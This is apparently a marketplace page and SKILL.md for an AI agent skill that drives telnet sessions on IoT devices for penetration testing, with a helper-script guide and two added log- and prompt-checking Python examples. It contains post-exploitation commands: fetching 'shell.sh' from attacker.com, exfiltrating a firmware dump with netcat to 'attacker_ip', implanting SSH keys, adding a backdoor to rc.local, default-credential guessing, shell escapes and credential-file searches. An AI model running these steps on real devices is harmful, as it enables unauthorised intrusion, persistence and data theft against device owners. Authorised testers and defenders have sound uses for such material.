telnetshell

Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.

Best use case

telnetshell is best used when you need a repeatable AI agent workflow instead of a one-off prompt. It is especially useful for teams working in multi.

Users should expect a more consistent workflow output, faster repeated execution, and less time spent rewriting prompts from scratch.

Practical example

Example input

Use the "telnetshell" skill to help with this workflow task. Context: Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.

Example output

A structured workflow result with clearer steps, more consistent formatting, and an output that is easier to reuse in the next run.

When to use this skill

  • Use this skill when you want a reusable workflow rather than writing the same prompt again and again.

When not to use this skill

  • Do not use this when you only need a one-off answer and do not need a reusable workflow.
  • Do not use it if you cannot install or maintain the related files, repository context, or supporting tools.

Installation

Claude Code / Cursor / Codex

$ curl -o ~/.claude/skills/telnetshell/SKILL.md --create-dirs "https://raw.githubusercontent.com/aiskillstore/marketplace/main/skills/brownfinesecurity/telnetshell/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/telnetshell/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How telnetshell Compares

| Feature / Agent | telnetshell | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |

Frequently Asked Questions

What does this skill do?

Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# IoT Telnet Shell (telnetshell)

This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.

## Prerequisites

- Python 3 with pexpect library (`pip install pexpect` or `sudo pacman -S python-pexpect`)
- telnet client installed on the system (`sudo pacman -S inetutils` on Arch)
- Network access to the target device's telnet port

## Recommended Approach: Telnet Helper Script

**IMPORTANT**: This skill includes a Python helper script (`telnet_helper.py`) that provides a clean, reliable interface for telnet communication. **This is the RECOMMENDED method** for interacting with IoT devices.

### Default Session Logging

**ALL commands run by Claude will be logged to `/tmp/telnet_session.log` by default.**

To observe what Claude is doing in real-time:
```bash
# In a separate terminal, run:
tail -f /tmp/telnet_session.log
```

This allows you to watch all telnet I/O as it happens without interfering with the connection.

### Why Use the Telnet Helper?

The helper script solves many problems with direct telnet usage:
- **Clean output**: Automatically removes command echoes, prompts, and ANSI codes
- **Prompt detection**: Automatically detects and waits for device prompts
- **Timeout handling**: Proper timeout management with no arbitrary sleeps
- **Easy scripting**: Simple command-line interface for single commands or batch operations
- **Session logging**: All I/O logged to `/tmp/telnet_session.log` for observation
- **Reliable**: No issues with TTY requirements or background processes
- **JSON output**: For programmatic parsing and tool chaining

### Quick Start with Telnet Helper

**Single Command:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
```

**Custom Port:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
```

**With Custom Prompt (recommended for known devices):**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt "^/ [#\$]" --command "ifconfig"
```

**Interactive Mode:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
```

**Batch Commands from File:**
```bash
# Create a file with commands (one per line)
echo -e "uname -a\ncat /proc/version\nifconfig\nps" > commands.txt
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt
```

**JSON Output (for parsing):**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a" --json
```

**Debug Mode:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "ls" --debug
```

**Session Logging (for observation):**
```bash
# Terminal 1 - Run with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --logfile /tmp/session.log \
  --interactive

# Terminal 2 - Watch the session in real-time
tail -f /tmp/session.log
```

**Note:** See `OBSERVING_SESSIONS.md` for a comprehensive guide on monitoring telnet sessions.

### Telnet Helper Options

```
Required (one of):
  --command, -c CMD         Execute single command
  --interactive, -i         Enter interactive mode
  --script, -s FILE         Execute commands from file

Connection Options:
  --host, -H HOST           Target host IP or hostname (required)
  --port, -P PORT           Telnet port (default: 23)
  --timeout, -t SECONDS     Command timeout (default: 3.0)
  --prompt, -p PATTERN      Custom prompt regex pattern

Output Options:
  --raw, -r                 Don't clean output (show echoes, prompts)
  --json, -j                Output in JSON format
  --logfile, -l FILE        Log all I/O to file (default: /tmp/telnet_session.log)
  --debug                   Show debug information
```

### Common Prompt Patterns

The helper script includes common prompt patterns, but you can specify custom ones:

```bash
# BusyBox shell (common on IoT)
--prompt "/\s*[#\$]\s*$"

# Standard root/user prompts
--prompt "^[#\$]\s*$"

# Custom device
--prompt "^MyDevice>\s*$"

# Uniview cameras
--prompt "^User@[^>]+>\s*$"
```
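
A candidate `--prompt` pattern can be checked offline against captured output before it is used, which catches the "wrong prompt detection" case where the regex also matches a line inside command output. This is an added example, not code from the skill; it assumes the pattern is searched line by line in ANSI-stripped text (how `telnet_helper.py` applies it internally is not shown here), and `check_prompt`, `CAPTURE` and `PATTERNS` are names made up for the illustration.

```python
import re

# Strip CSI escape sequences (colours, cursor moves) emitted by the device.
ANSI = re.compile(r"\x1b\[[0-9;?]*[A-Za-z]")


def check_prompt(pattern, captured):
    """Test a candidate --prompt regex against captured session output.

    Returns (matches_final_line, early_lines): whether the pattern matches the
    last line, where the real prompt sits, and the 1-based numbers of earlier
    lines it also matches, which would end a read too soon.
    """
    rx = re.compile(pattern)
    lines = ANSI.sub("", captured).splitlines()
    if not lines:
        return False, []
    early = [n for n, line in enumerate(lines[:-1], start=1) if rx.search(line)]
    return bool(rx.search(lines[-1])), early


# Constructed capture: output of one command on a BusyBox device whose prompt
# is "/ # ", including a bare "#" comment line and a colourised prompt.
CAPTURE = (
    "cat /etc/inittab\r\n"
    "# /etc/inittab\r\n"
    "#\r\n"
    "::sysinit:/etc/init.d/rcS\r\n"
    "\x1b[1;32m/ # \x1b[0m"
)

# Patterns taken from this page (after the shell has removed the backslash
# quoting, "\$" inside double quotes reaches the script as "$").
PATTERNS = {
    "busybox": r"/\s*[#\$]\s*$",
    "root_user": r"^[#\$]\s*$",
    "quick_start": r"^/ [#\$]",
}

if __name__ == "__main__":
    for name, pattern in PATTERNS.items():
        final, early = check_prompt(pattern, CAPTURE)
        print(f"{name:12} final_prompt={final} early_matches={early}")
```

On this capture the standard root/user pattern misses the real `/ # ` prompt and matches the bare `#` comment on line 3, while the BusyBox and quick-start patterns match only the final line.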

### Device Enumeration Example with Telnet Helper

Here's a complete example of safely enumerating a device:

```bash
# Set variables for convenience
HELPER="python3 .claude/skills/telnetshell/telnet_helper.py"
HOST="192.168.1.100"
PORT="2222"
LOGFILE="/tmp/telnet_session.log"

# System information
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "uname -a"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/version"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/cpuinfo"

# Check for BusyBox
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "busybox"

# Network configuration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ifconfig"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "route -n"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "netstat -tulpn"

# Process listing (may need longer timeout)
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --timeout 5 --command "ps aux"

# File system exploration
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ls -la /"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "mount"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "df -h"

# Security assessment
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "find / -perm -4000 2>/dev/null"
```

**IMPORTANT FOR CLAUDE CODE**: When using this skill, ALWAYS include `--logfile /tmp/telnet_session.log` in every command so the user can monitor activity with `tail -f /tmp/telnet_session.log`.

## Instructions

### 1. Connection Setup

**Default connection:**
- **Port**: 23 (standard telnet, override with `--port`)
- **Timeout**: 3 seconds (override with `--timeout`)
- **Logging**: `/tmp/telnet_session.log` by default

**Common telnet ports on IoT devices:**
- 23: Standard telnet port
- 2222: Alternative telnet port (common on cameras)
- 8023: Alternative telnet port
- Custom ports: Check device documentation or nmap scan results

### 2. BusyBox Shells (Most IoT Devices)

**IMPORTANT**: The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.

**Identifying BusyBox:**
```bash
# Check what shell you're using
busybox
busybox --help

# Or check symlinks
ls -la /bin/sh
# Often shows: /bin/sh -> /bin/busybox

# List available BusyBox applets
busybox --list
```

**BusyBox Limitations:**
- Many standard Linux commands may be simplified versions
- Some common flags/options may not be available
- Features like tab completion may be limited or absent
- Some exploitation techniques that work on full Linux may not work

**Common BusyBox commands available:**
```bash
# Core utilities (usually available):
#   cat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown
#   ps, kill, top, free, df, mount, umount
#   grep, find, sed, awk (limited versions)
#   ifconfig, route, ping, netstat, telnet
#   vi (basic text editor - no syntax highlighting)

# Check what's available
busybox --list | sort
ls /bin /sbin /usr/bin /usr/sbin
```

**BusyBox-specific considerations for pentesting:**
- `ps` output format may differ from standard Linux
- Some privilege escalation techniques require commands not in BusyBox
- File permissions still work the same (SUID, sticky bits, etc.)
- Networking tools are often present (telnet, wget, nc/netcat, ftpget)
- Python/Perl/Ruby are usually NOT available (device storage constraints)

**Useful BusyBox commands for enumeration:**
```bash
# Check BusyBox version (may have known vulnerabilities)
busybox | head -1

# Network utilities often available
nc -l -p 4444  # Netcat listener
wget http://attacker.com/shell.sh
ftpget server file
telnet 192.168.1.1

# httpd (web server) often included
busybox httpd -p 8080 -h /tmp  # Quick file sharing
```

### 3. Device Enumeration

Once you have shell access, gather the following information:

**System Information:**
```bash
# Kernel and system info
uname -a
cat /proc/version
cat /proc/cpuinfo
cat /proc/meminfo

# Distribution/firmware info
cat /etc/issue
cat /etc/*release*
cat /etc/*version*

# Hostname and network
hostname
cat /etc/hostname
ifconfig -a
cat /etc/network/interfaces
cat /etc/resolv.conf

# Mounted filesystems
mount
cat /proc/mounts
df -h

# Running processes
ps aux
ps -ef
top -b -n 1
```

**User and Permission Information:**
```bash
# Current user context
id
whoami
groups

# User accounts
cat /etc/passwd
cat /etc/shadow  # If readable - major security issue!
cat /etc/group

# Sudo/privilege info
sudo -l
cat /etc/sudoers
```

**Network Services:**
```bash
# Listening services
netstat -tulpn
lsof -i

# Firewall rules
iptables -L -n -v
cat /etc/iptables/*
```

**Interesting Files and Directories:**
```bash
# Configuration files
ls -la /etc/
find /etc/ -type f -readable

# Web server configs
ls -la /etc/nginx/
ls -la /etc/apache2/
ls -la /var/www/

# Credentials and keys
find / -name "*.pem" 2>/dev/null
find / -name "*.key" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*credential*" 2>/dev/null
grep -r "password" /etc/ 2>/dev/null

# SUID/SGID binaries (privilege escalation vectors)
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null

# World-writable files/directories
find / -perm -2 -type f 2>/dev/null
find / -perm -2 -type d 2>/dev/null

# Development/debugging tools
which gdb gcc python perl ruby tcpdump
ls /usr/bin/ /bin/ /sbin/ /usr/sbin/
```

### 4. Privilege Escalation (if not root)

**Check for common vulnerabilities:**
```bash
# Kernel exploits
uname -r  # Check kernel version for known exploits

# Check for exploitable services
ps aux | grep root

# Writable service files
find /etc/init.d/ -writable 2>/dev/null

# Cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
```

### 5. Persistence and Further Access

**Establish additional access methods:**
```bash
# Add SSH access (if SSH is available)
mkdir -p /root/.ssh
echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chmod 700 /root/.ssh

# Start SSH service (if not running)
/etc/init.d/ssh start
# or
/etc/init.d/sshd start
# or
/etc/init.d/dropbear start  # Common on embedded devices

# Add to startup scripts
echo "/path/to/backdoor &" >> /etc/rc.local
```

### 6. Firmware Extraction

**Extract firmware for offline analysis:**
```bash
# Find MTD partitions (common on embedded devices)
cat /proc/mtd
cat /proc/partitions

# Dump flash partitions
dd if=/dev/mtd0 of=/tmp/bootloader.bin
dd if=/dev/mtd1 of=/tmp/kernel.bin
dd if=/dev/mtd2 of=/tmp/rootfs.bin

# Copy to external storage or network
# If network is available:
nc attacker_ip 4444 < /tmp/rootfs.bin

# If HTTP server is available:
cd /tmp
busybox httpd -p 8000
# Then download from http://device_ip:8000/rootfs.bin
```

## Common IoT Device Scenarios

### Scenario 1: No Authentication Shell
```bash
# Connect - drops directly to root shell
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive
# Enumerate and exploit
```

### Scenario 2: Custom Port No-Auth Shell
```bash
# Many IoT cameras use port 2222
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive
```

### Scenario 3: Password-Protected Shell
```bash
# If you encounter a password prompt, the helper will detect it
# Try default credentials:
# - root/root
# - admin/admin
# - root/(empty)
# Search online for device-specific defaults
```

### Scenario 4: Limited Shell Escape
```bash
# If you get a limited shell:
# Try common escape techniques:
echo $SHELL
/bin/sh
/bin/bash
vi  # Then :!/bin/sh
less /etc/passwd  # Then !/bin/sh
find / -exec /bin/sh \;
awk 'BEGIN {system("/bin/sh")}'
```

## Security Testing Checklist

- [ ] Identify device and firmware version
- [ ] Check for unauthenticated access
- [ ] Test for default/weak credentials
- [ ] Enumerate network services and open ports
- [ ] Check for hardcoded credentials in files
- [ ] Test for command injection vulnerabilities
- [ ] Check file permissions (SUID, world-writable)
- [ ] Check for outdated software with known CVEs
- [ ] Test for privilege escalation vectors
- [ ] Extract firmware for offline analysis
- [ ] Document all findings with screenshots/logs

## Best Practices

1. **Always log your session**: Default logfile is `/tmp/telnet_session.log`
2. **Document everything**: Take notes on commands, responses, and findings
3. **Use batch scripts**: Create enumeration scripts for common tasks
4. **Research the device**: Look up known vulnerabilities, default credentials, and common issues
5. **Use proper authorization**: Only perform pentesting on devices you own or have explicit permission to test
6. **Be careful with destructive commands**: Avoid commands that could brick devices or corrupt data
7. **Monitor your session**: Use `tail -f` in another terminal to watch activity
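
A review pass over the session log, as an added example that is not part of the original skill: it flags logged commands that change device state or open listeners (the commands shown in sections 5 and 6), so the person supervising the agent does not have to catch them live in `tail -f`. It assumes the log is the plain text of the session; the rule names, `review_log` and the sample log are constructed here.

```python
import re

# Strip CSI escape sequences (colours, cursor moves) emitted by the device.
ANSI = re.compile(r"\x1b\[[0-9;?]*[A-Za-z]")

# Constructed rule names and patterns (not part of the skill). They cover the
# state-changing commands shown in sections 5 and 6 of this page.
RULES = [
    ("ssh-key-write", re.compile(r">>?\s*\S*authorized_keys\b")),
    ("startup-write", re.compile(r">>?\s*/etc/(rc\.local|init\.d/\S+)")),
    ("service-start", re.compile(r"/etc/init\.d/\S+\s+start\b")),
    ("flash-write", re.compile(r"\bdd\b.*\bof=/dev/mtd")),
    ("flash-read", re.compile(r"\bdd\b.*\bif=/dev/mtd")),
    ("listener-started", re.compile(r"\bhttpd\b.*-p\s*\d+|\bnc\b.*\s-l\b")),
    ("remote-fetch", re.compile(r"\b(wget|ftpget)\s+\S")),
]


def review_log(text):
    """Return (line_number, [labels], cleaned_line) for each flagged line."""
    findings = []
    previous = None
    for number, raw in enumerate(text.splitlines(), start=1):
        line = ANSI.sub("", raw).strip()
        # A telnet echo often repeats the command just sent; report it once.
        if not line or line == previous:
            continue
        previous = line
        labels = [name for name, rx in RULES if rx.search(line)]
        if labels:
            findings.append((number, labels, line))
    return findings


# Constructed sample of a session log, with CRLF line endings, one echoed
# duplicate and one colourised prompt.
SAMPLE_LOG = (
    "/ # uname -a\r\n"
    "Linux cam 3.10.14 #1 PREEMPT armv7l GNU/Linux\r\n"
    "/ # cat /proc/mtd\r\n"
    'mtd2: 00600000 00010000 "rootfs"\r\n'
    "/ # dd if=/dev/mtd2 of=/tmp/rootfs.bin\r\n"
    "/ # dd if=/dev/mtd2 of=/tmp/rootfs.bin\r\n"
    '\x1b[1;32m/ # \x1b[0mecho "CONSTRUCTED_KEY" >> /root/.ssh/authorized_keys\r\n'
    "/ # busybox httpd -p 8000\r\n"
    '/ # echo "/tmp/agent &" >> /etc/rc.local\r\n'
)

if __name__ == "__main__":
    for number, labels, line in review_log(SAMPLE_LOG):
        print(f"line {number}: {','.join(labels)}: {line}")
```

To review a real session, read `/tmp/telnet_session.log` as text and pass its contents to `review_log`; flagged lines are the ones to confirm against the engagement scope and to undo on the device afterwards.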

## Troubleshooting

**Problem: Connection refused**
- Solution: Check if telnet service is running, verify port number, check firewall rules

**Problem: Connection timeout**
- Solution: Verify network connectivity, check if device is powered on, verify IP address

**Problem: "Permission denied"**
- Solution: Telnet service may require authentication, try default credentials

**Problem: Commands not echoing**
- Solution: Use `--raw` flag to see unfiltered output

**Problem: Garbled output or wrong prompt detection**
- Solution: Use `--prompt` flag with custom regex pattern for your specific device

## Pre-built Enumeration Scripts

The skill includes pre-built enumeration scripts for common tasks:

- `enum_system.txt`: System information gathering
- `enum_network.txt`: Network configuration enumeration
- `enum_files.txt`: File system exploration
- `enum_security.txt`: Security-focused enumeration

**Usage:**
```bash
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --script .claude/skills/telnetshell/enum_system.txt
```

## Example Usage

```bash
# Basic connection to standard telnet port
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"

# Connection to custom port (common for IoT cameras)
python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"

# Interactive session with logging
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --logfile /tmp/camera_session.log \
  --interactive

# Batch enumeration
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --port 2222 \
  --script enum_system.txt \
  --json > results.json

# Long-running command with custom timeout
python3 .claude/skills/telnetshell/telnet_helper.py \
  --host 192.168.1.100 \
  --timeout 10 \
  --command "find / -name '*.conf'"
```

## References

- [BusyBox Official Site](https://busybox.net/)
- [BusyBox Command List](https://busybox.net/downloads/BusyBox.html)
- IoT pentesting resources and vulnerability databases
- Device-specific documentation and datasheets
